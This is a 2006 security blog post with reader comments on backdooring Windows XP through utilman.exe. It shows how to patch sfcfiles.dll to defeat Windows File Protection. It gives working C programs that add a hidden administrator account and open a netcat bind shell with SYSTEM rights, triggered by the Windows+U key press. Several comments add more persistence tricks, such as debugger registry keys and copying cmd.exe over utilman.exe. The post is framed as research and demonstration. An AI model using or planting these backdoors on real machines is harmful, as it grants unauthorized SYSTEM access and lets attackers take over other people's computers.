Didier Stevens

Monday 21 August 2006

Playing with utilman.exe

Filed under: Hacking — Didier Stevens @ 19:39

I’d never heard about utilman.exe before MS04-019 was released. Windows Utility Manager can be started by pressing the Windows Logo key & U key. Fascinated by the fact that pressing a simple key sequence will start a program with the SYSTEM account (regardless of the credentials of the user), I decided I had to play with this feature.

2 years later, I’ve taken the time to experiment with utilman.exe.

Pressing Windows Logo & U instructs Winlogon to start c:\windows\system32\utilman.exe. Windows won’t let you replace utilman.exe by another program, it’s protected by the Windows File Protection feature. The list of protected files is stored in c:\windows\system32\sfcfiles.dll. Patching this DLL allows you to “unprotect” system files.

Open sfcfiles.dll with a hex editor like XVI32 and search for UNICODE string utilman.exe. You’ll find several entries like %systemroot%\system32\utilman.exe. Replace these entries with the empty string and utilman.exe won’t be protected anymore: replace the first character % with byte 00. You can’t patch sfcfiles.dll on a live system. The trick is to save your patched sfcfiles.dll in another directory, boot from a live CD like BartPE and replace it. Or use a utility that will replace the file when you reboot Windows, like Sysinternals’s movefile.

Edited tuesday 22 August 2006: I forgot to mention the PE checksum. Patching sfcfiles.dll changes the PE checksum, you have to correct it with a tool like LordPE.

Now utilman.exe is not protected anymore and we can replace it with our own “useful” utilities. BTW, don’t forget you’re doing this at your own risk ;-)

You can compile the following examples with Borland’s free C++ 5.5 compiler.

First experiment

Compile this simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])
{
	system("net user hack knock /add");
	system("net localgroup administrators hack /add");

return 0;
}

Whenever you press the magic key sequence, a new administrative account hack (with password knock) will be created on your system, even if you’re a normal user without administrative rights.

Second experiment

Compile this other simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])
{
	system("nc -l -p 1234 -e cmd.exe");

return 0;
}

Put also a copy of netcat (nc.exe) in system32.

Each time you press the magic key sequence, netcat will start, listen on port 1234 and launch cmd.exe (with SYSTEM account) when you connect to the port:

nc 127.0.0.1 1234

Third experiment

Winlogon is a service, and as such it doesn’t interact wih the desktop. Services have their own noninteractive window station Service-0×0-3e7$. To interact with the desktop (display dialogs, accepts key strokes & mouse clicks, …), a service must use station WinSta0. Each program that is started inherits its windows station from its parent process.

This explains why utilman.exe replacement programs don’t show up on the desktop. They interact with Winlogon’s window station, which is the noninteractive window station Service-0×0-3e7$. But a program can change its window station.
Compile this C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])
{
	HWINSTA hwinsta;
	HDESK   hdesk;

hwinsta = OpenWindowStation("WinSta0", TRUE,
							  WINSTA_ACCESSCLIPBOARD   |
							  WINSTA_ACCESSGLOBALATOMS |
							  WINSTA_CREATEDESKTOP     |
							  WINSTA_ENUMDESKTOPS      |
							  WINSTA_ENUMERATE         |
							  WINSTA_EXITWINDOWS       |
							  WINSTA_READATTRIBUTES    |
							  WINSTA_READSCREEN        |
							  WINSTA_WRITEATTRIBUTES);
	SetProcessWindowStation(hwinsta);
	hdesk = OpenDesktop("Default", 0, FALSE,
						DESKTOP_CREATEMENU |
						DESKTOP_CREATEWINDOW |
						DESKTOP_ENUMERATE    |
						DESKTOP_HOOKCONTROL  |
						DESKTOP_JOURNALPLAYBACK |
						DESKTOP_JOURNALRECORD |
						DESKTOP_READOBJECTS |
						DESKTOP_SWITCHDESKTOP |
						DESKTOP_WRITEOBJECTS);
	SetThreadDesktop(hdesk);
	MessageBox(0, "Hello from utilman", "utilman.exe", 0);
	CloseDesktop(hdesk);
	CloseWindowStation(hwinsta);

return 0;
}

Each time you press the magic key sequence, you’ll see a nice popup.

Remember, these hacks open security holes on your system.

38 Comments »

  1. Nice! The advent of live CDs ushered in a whole new era, really. Windows security, for the most part, is only effective when the OS is running. Even more incentive to make sure when a system boots, the admin has control of what actually boots. And my colleagues thought me weird when I mandated BIOS passwords and boot order lockdown after learning about Phlack. :-p

    This can make a nice POC tool where you can demonstrate, quite quickly, swapping out

    Comment by LonerVamp — Monday 21 August 2006 @ 20:26

  2. I’m preparing a post about hacking a machine with network boot (PXE). Everything was locked down in the BIOS, except network boot. The research is done, I just want to find free software equivalents of the utils I used.

    Comment by Didier Stevens — Monday 21 August 2006 @ 20:35

  3. Sounds very useful, and I can’t wait to see that!

    Comment by LonerVamp — Tuesday 22 August 2006 @ 20:27

  4. About the third experiment:

    Does it work when you are not on the WinSta0 Desktop?

    Comment by evilbitz — Saturday 26 August 2006 @ 12:14

  5. If you are on another Windows station, you will have to adapt the code to display it on the station you’re on.

    Comment by Didier Stevens — Sunday 27 August 2006 @ 13:55

  6. Yeah, but the gina isn’t at WinSta0 right?

    Comment by evilbitz — Tuesday 29 August 2006 @ 10:35

  7. Yes it is on Windows Station WinSta0, but it’s on another Desktop, the Winlogon desktop WinSta0\Winlogon

    Comment by Didier Stevens — Tuesday 29 August 2006 @ 17:32

  8. I think I understand your first question now: Does it work when you are not on the WinSta0 Desktop?

    You mean pressing Windows Logo & U when you have the logon screen! No, that doesn’t work, because this is a different desktop. The Interactive Desktop is Default and the logon desktop is Winlogon.

    Sorry, I didn’t think this one through. Pressing Windows Logo & U calls utilman.exe from the logon screen. To test if example 3 shows a message box on the logon screen, you’ll have to modify the source code to use Desktop Winlogon:
    hdesk = OpenDesktop(“Winlogon”, 0, FALSE, …

    Comment by Didier Stevens — Tuesday 29 August 2006 @ 17:54

  9. Ok,
    Thanks ;)

    This is what i wanted to know!

    Comment by evilbitz — Tuesday 29 August 2006 @ 20:56

  10. [...] Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe: [...]

    Pingback by My second playdate with utilman.exe « Didier Stevens — Thursday 31 August 2006 @ 20:46

  11. Can u please mail me on how to unprotect the utilman.exe file. When I try it says cannot be found plz run through it a little slower.

    thx , Dave

    Comment by Dave — Tuesday 21 November 2006 @ 23:42

  12. > When I try it says cannot be found
    Can you be more specific?

    What says “cannot be found”?

    Comment by Didier Stevens — Wednesday 22 November 2006 @ 0:02

  13. Hello!
    Instead of changing the dll and replacing it, could it be possible just to replace the utilman.exe?
    Or the dll also has some sort of CRC of the protected exe and needs to be patched?
    Thanks

    Comment by Miguel — Sunday 25 March 2007 @ 12:03

  14. No, if you just replace utilman.exe, it will be restored by WFP

    Comment by Didier Stevens — Tuesday 27 March 2007 @ 20:26

  15. There is another method – if you rename or delete the utilman.exe from %SystemRoot%\System32\DllCache first, then WFP will not find it to copy over the replacement.

    Comment by steve — Monday 7 May 2007 @ 19:32

  16. There’s very easy way to replace utilman.exe or any other protected exe. Just create REG_SZ pointing to your custom exe on HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger. Windows will think you want to debug utilman.exe and launch program specified on Debugger registry key instead. If you want visible program you can use psexec (“psexec -s -accepteula cmd.exe” should work) or CreateProcessAsUser.exe (google for it).

    Comment by jr — Friday 17 August 2007 @ 21:17

  17. Ah yes, the famous debugger keys. Indeed, this works fine, someone mailed me a PoC using this trick.

    Comment by Didier Stevens — Wednesday 22 August 2007 @ 18:06

  18. Hi…

    I’ve used XVI32 and PETools (I don’t find LORDPE) to modify sfcfiles.dll, but it hasn’t worked; my objective was to eliminate protected folders of %Program Files% (xerox, frontpage, etc). So, I searched all %Program Files% strings and changed first HEX 25 (%) to 00 (empty) as said on article, and afterthat, I rebuilt PE header with PETools; I put a copy of modified sfcfiles.dll into dllcache folder and rebooted…what was my surprise, on logon screen, winlogon said to have failed at start, I tried to logon writing my user and password, but computer restarted automaticly. What was wrong?

    Comment by drstrangelove — Thursday 3 January 2008 @ 15:41

  19. This is a clear indication that Windows detects a change in the sfcfiles.dll file. If you want, you can mail me the file and I’ll have a look at it.

    Comment by Didier Stevens — Friday 4 January 2008 @ 20:27

  20. I came across a similar “trick” using sethc.exe but I guess that Sticky Keys can be disabled. I understand that this sort of behaviour can be seen with any file running as System but I guess that some such files might not take kindly to being messed around in this way!

    Does anyone else have any tips about local privilege escalation (without prior knowledge of Admin PW) or files that run as System which can be used (safely)?

    Comment by Dave — Saturday 12 April 2008 @ 15:58

  21. To avoid any confusion: this trick with utilman is not a local privilege escalation, it’s a local backdoor.

    Comment by Didier Stevens — Monday 14 April 2008 @ 10:22

  22. Thanks for the clarification. I know that the Windows key and Sticky Keys function can be disabled. Does anyone know of any other similar backdoors for XP? I heard of the magnify.exe backdoor for Vista.

    Comment by Dave — Monday 14 April 2008 @ 11:59

  23. Over at Offensive Security they have a video instruction where they simply renamed utilman.exe to utilman.old, then copied cmd.exe to utilman.exe, on a Vista machine. It gives you a command prompt right from the login screen.

    http://www.offensive-security.com/movies/vistahack/vistahack.html

    Comment by ZenMasterBob — Thursday 3 July 2008 @ 18:15

  24. I’ve made a movie for XP about 2 years ago: http://blog.didierstevens.com/2006/09/05/playing-with-utilmanexe-the-motion-picture/

    If you replace utilman.exe on XP, you’ll see WFP in action as it replaces utilman.exewith the cached original file. This is a feature thathas been abandoned in Vista.

    I wonder if my video inspired Offensive Security.

    Comment by Didier Stevens — Friday 4 July 2008 @ 17:51

  25. Hi all, does somebody know if MS changed the described functionality?

    I cannot start a visible process on Windows XP SP3 with Win + U. Only the real utilman.exe is doing this.
    If I start it normally in a user session, the message is shown just fine.

    Thx, best regards

    Comment by MF — Monday 5 October 2009 @ 10:41

  26. It only works if you compile the program and replace utilman.exe with it.

    Comment by Didier Stevens — Monday 5 October 2009 @ 16:28

  27. Yes, I compiled the third example and replaced the “Default”-Desktop with “Winlogon”.

    Still not working…

    Comment by MF — Tuesday 6 October 2009 @ 6:13

  28. And you’ve done the necessary to prevent Windows File Protection from restoring the original utilman.exe?

    You can try what’s explained in comment #16 as an alternative to circumventing WFP.

    Comment by Didier Stevens — Tuesday 6 October 2009 @ 19:06

  29. When I used Windows Logo Key + U utility manager comes. In which
    * Magnifier is not running
    * Narrator is running
    * On screen Keyboard is not running
    Options comes.

    Please tell me how can I get CMD window.

    Comment by Aman Khan — Monday 5 April 2010 @ 5:07

  30. guys i can provide u much more simple way to replace utilman.exe as well as get entry into windows..

    which is quite easy ..

    jus wait for my next post.. i ll provide u link of my blog..

    Comment by prashant — Monday 21 June 2010 @ 5:34

  31. @prashant Interesting, but note that your simple solution must work on XP. Doing this on Vista or Win 7 is trivial.

    Comment by Didier Stevens — Monday 21 June 2010 @ 16:26

  32. I know this post is outdated, but a way to hack WFP is:

    type hack.exe > utilman.exe
    :D

    Comment by qwertyoruiop — Friday 16 July 2010 @ 13:40

  33. nice idea

    Comment by Anonymous — Saturday 11 June 2011 @ 14:57

  34. This is very interesting, I will probably use this to run some nifty shortcuts or make a useless nuke button or maybe even a lockdown……

    I made it more stealthy and efficient by adding a command that takes ownership of files along with xcopy, after that it issues the “shutdown -r -f -t 00″ which is very hx0rish…. Slightly dumb and stupid, yes. Cool factor 10. I like the http://www.howtogeek.com/howto/windows-vista/change-your-forgotten-windows-password-with-the-linux-system-rescue-cd/ article to make a guest account admin privileges…..

    Sad part is if you have Heirens boot cd on a usb than you just boot click create admin and restart….

    Comment by dooshy — Tuesday 25 October 2011 @ 22:29

  35. I saw your video on youtube. How did you capture the screen?

    Comment by Anonymous — Saturday 30 June 2012 @ 12:26

  36. @Anonymous I did it with VMware Workstation.

    Comment by Didier Stevens — Saturday 30 June 2012 @ 19:39

  37. Can someone share the executable compiled?
    Thanks b.clabots at

    Comment by Anonymous — Tuesday 5 February 2013 @ 20:24


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 221 other followers

%d bloggers like this: